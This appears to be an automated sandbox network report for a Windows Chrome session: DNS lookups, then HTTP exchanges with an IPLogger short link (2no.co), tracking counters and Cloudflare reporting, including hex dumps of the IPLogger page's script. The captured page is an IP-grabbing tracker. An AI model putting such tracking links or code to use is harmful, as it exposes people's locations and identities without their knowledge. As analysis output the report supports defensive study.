Jul 30, 2024 00:47:32.128716946 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5af | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.3 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:48:02.861970901 CEST | 1.1.1.1 | 192.168.2.7 | 0x8db6 | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:48:02.861970901 CEST | 1.1.1.1 | 192.168.2.7 | 0x8db6 | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:48:02.861970901 CEST | 1.1.1.1 | 192.168.2.7 | 0x8db6 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:48:02.861970901 CEST | 1.1.1.1 | 192.168.2.7 | 0x8db6 | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.4 | A (IP address) | IN (0x0001) | false
                                                                                                • 2no.co
                                                                                                • https:
                                                                                                  • cdn.iplogger.org
                                                                                                  • counter.yadro.ru
                                                                                                • a.nel.cloudflare.com
                                                                                                • slscr.update.microsoft.com
                                                                                                • fs.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49712 | 172.67.149.76 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:46:19 UTC | 655 | OUT | GET /24RXx6 HTTP/1.1
                                                                                                Host: 2no.co
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-User: ?1
                                                                                                Sec-Fetch-Dest: document
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:46:20 UTC | 1092 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 29 Jul 2024 22:46:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                set-cookie: 54988964137263905=3; expires=Tue, 29 Jul 2025 22:46:19 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                set-cookie: unikey=unikey_49d0b0ee8333a2d8b518de4ac29b97bf7c2b5a039ac7ef754e17b18bdb866b9f; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                memory: 0.42243194580078125
                                                                                                expires: Mon, 29 Jul 2024 22:46:19 +0000
                                                                                                strict-transport-security: max-age=604800
                                                                                                strict-transport-security: max-age=31536000
                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZixMdHDmVkG6JBeoFBCK%2FGLboVik9yJiI5mRegq6j2XBA3pOsQDKYbsHE8t8FzG%2FAHZa07X%2B6jsjBfJqjP2LCdwx1UgQ0HdqLogDAL4SiT8ryA1A3GqPBm8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ab0a4f4dd1e4401-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
2024-07-29 22:46:20 UTC | 277 | IN
                                                                                                Data Ascii: 26b5<!DOCTYPE html><html lang="US" class="html"><head><title>Branded Short Domain</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" conten
2024-07-29 22:46:20 UTC | 1369 | IN
                                                                                                Data Ascii: initial-scale=1, user-scalable=yes"><meta name="author" content="Deorg" /><meta name="copyright" content="Copyright IPLogger 2010-2024" /><meta name="robots" content="index, follow" /><meta name="revisit-after" content="7 days" /><meta name=
2024-07-29 22:46:20 UTC | 1369 | IN
                                                                                                Data Ascii: round:#E5E5E5;font-family:Helvetica,Arial,sans-serif;letter-spacing:0.2px;font-size:1em}@media screen and (max-width:800px){body{font-size:1.2em}}#loader{position:absolute;top:0px;left:0px;right:0px;bottom:0px;background:#E5E5E5;z-index:10000;padding-top:
2024-07-29 22:46:20 UTC | 1369 | IN
                                                                                                Data Ascii: ocation to display the map...";position:absolute;width:250px;top:25%;left:calc(50% - 125px);text-align:center;font-size:24px;color:#818181}#me{border:1px dashed black;height:40px;line-height:40px;text-align:center}@media (max-width: 800px){#mapper{hei
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 27 29 2c 78 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 41 63 63 65 70 74 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 6e 64 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 61 74 61 29 29 2c 78 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 6a 73 6f 6e 29 7b 69 66 28 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 21 3d 34 29 72 65 74 75 72 6e 3b 74 72 79 7b 6a 73 6f 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 63 61 74 63 68 28 65 29 7b 6a 73 6f 6e 3d 7b 7d 7d 3b 63 61 6c 6c 62 61 63 6b 28 6a 73
                                                                                                Data Ascii: '),x.setRequestHeader("Accept","application/json"),x.setRequestHeader("Content-Type","application/json"),x.send(JSON.stringify(data)),x.onload=function(json){if(this.readyState!=4)return;try{json=JSON.parse(this.responseText)}catch(e){json={}};callback(js
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 0d 09 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 31 70 78 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 7b 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 3e 20 69 6d 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b
                                                                                                Data Ascii: nt-size:28px;font-style:normal;font-weight:bold;color:#333333;text-align: center;}.content {padding: 5px 0px;margin:0;line-height:21px;color:#333333;font-size:14px;text-align:justify}.handshake {}.handshake > img {display:block
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 29 2c 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0d 09 70 2c 20 75 6c 20 6c 69 2c 20 6f 6c 20 6c 69 2c 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0a 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 31 20 61 2c 20 68 32 20 61 2c 20 68 33 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 20 7d 0a 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 7d 0a 09 68 32 20 7b 20 66 6f 6e 74
                                                                                                Data Ascii: @media only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 34 39 64 30 62 30 65 65 38 33 33 33 61 32 64 38 62 35 31 38 64 65 34 61 63 32 39 62 39 37 62 66 37 63 32 62 35 61 30 33 39 61 63 37 65 66 37 35 34 65 31 37 62 31 38 62 64 62 38 36 36 62 39 66 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c
                                                                                                Data Ascii: ass="submit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_49d0b0ee8333a2d8b518de4ac29b97bf7c2b5a039ac7ef754e17b18bdb866b9f"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><
                                                                                                2024-07-29 22:46:20 UTC57INData Raw: 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: ';'),d.body.appendChild(a);</script></body></html>
                                                                                                2024-07-29 22:46:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49719 | 172.67.132.113 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:46:20 UTC | 588 | OUT | GET /redirect/handshake.png HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:46:20 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 29 Jul 2024 22:46:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                Origin-Agent-Cluster: ?1
                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                Referrer-Policy: same-origin
                                                                                                X-Content-Options: nosniff
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                cf-mitigated: challenge


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49718 | 88.212.201.198 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:46:21 UTC | 664 | OUT | GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:46:21 UTC | 601 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:21 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 32
                                                                                                Connection: close
                                                                                                Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Strict-Transport-Security: max-age=86400
2024-07-29 22:46:21 UTC | 32 | IN | Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <html><body>Moved</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49724 | 35.190.80.1 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:46:21 UTC | 535 | OUT | OPTIONS /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Origin: https://cdn.iplogger.org
                                                                                                Access-Control-Request-Method: POST
                                                                                                Access-Control-Request-Headers: content-type
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:46:21 UTC | 336 | IN | HTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                access-control-max-age: 86400
                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                date: Mon, 29 Jul 2024 22:46:21 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49725 | 88.212.201.198 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:46:22 UTC | 705 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6
                                                                                                2024-07-29 22:46:22 UTC | 481 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:22 GMT
                                                                                                Content-Type: image/gif
                                                                                                Content-Length: 445
                                                                                                Connection: close
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: VID=2DNPIG0nbdur1cg1k-0018Z0; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Strict-Transport-Security: max-age=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                5 | 192.168.2.7 | 49727 | 35.190.80.1 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:22 UTC | 476 | OUT | POST /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 424
                                                                                                Content-Type: application/reports+json
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:22 UTC | 424 | OUT | Data Ascii: [{"age":2,"body":{"elapsed_time":863,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"172.67.132.113","status_code":403,"type":"http.error"},"type":"network-error","url":"https://
                                                                                                2024-07-29 22:46:22 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                date: Mon, 29 Jul 2024 22:46:22 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                6 | 192.168.2.7 | 49730 | 172.67.132.113 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:23 UTC | 577 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:23 UTC | 767 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/x-icon
                                                                                                Content-Length: 2833
                                                                                                Connection: close
                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                etag: "629f3a26-b11"
                                                                                                strict-transport-security: max-age=31536000
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 5861
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilFQQzuA4afABT3TeZRGQ7mBTEa%2Fy7Ruu2BC%2F4Qvx4L%2F%2BMrHA0jWLNTRhtENISkJp%2BObX0YaFw%2FZKf7iMW8%2BM1GrJyMWbTi29ir2FlUBOTMg%2B0GuHl%2FoJxyonQNEdTQhFnWU"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ab0a50adc0543bf-EWR
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.2.7 | 49731 | 88.212.201.204 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:23 UTC | 509 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; VID=2DNPIG0nbdur1cg1k-0018Z0
                                                                                                2024-07-29 22:46:23 UTC | 459 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/gif
                                                                                                Content-Length: 445
                                                                                                Connection: close
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Strict-Transport-Security: max-age=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.2.7 | 49734 | 172.67.132.113 | 443 | 7740 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:23 UTC | 351 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:23 UTC | 761 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/x-icon
                                                                                                Content-Length: 2833
                                                                                                Connection: close
                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                etag: "629f3a26-b11"
                                                                                                strict-transport-security: max-age=31536000
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 5861
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Fq8xFJxy1CFmg%2FhGgtf8tpavgBYSBpENAHMDTzb5qzGD8spBaYR3KLF0dIK1SGQYi4BDQyuc%2F%2BJoEPk6ZIULhvfAK5AitLlt0QPfLImLw6C%2BHGFgqz9AwqgoFYmP%2FgKxm%2FQ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ab0a50f09870f5f-EWR
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.2.7 | 49729 | 13.85.23.86 | 443 | |
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-07-29 22:46:23 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-07-29 22:46:25 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                MS-CorrelationId: ba1871d7-a3ce-4592-aca2-0d5d1406282f
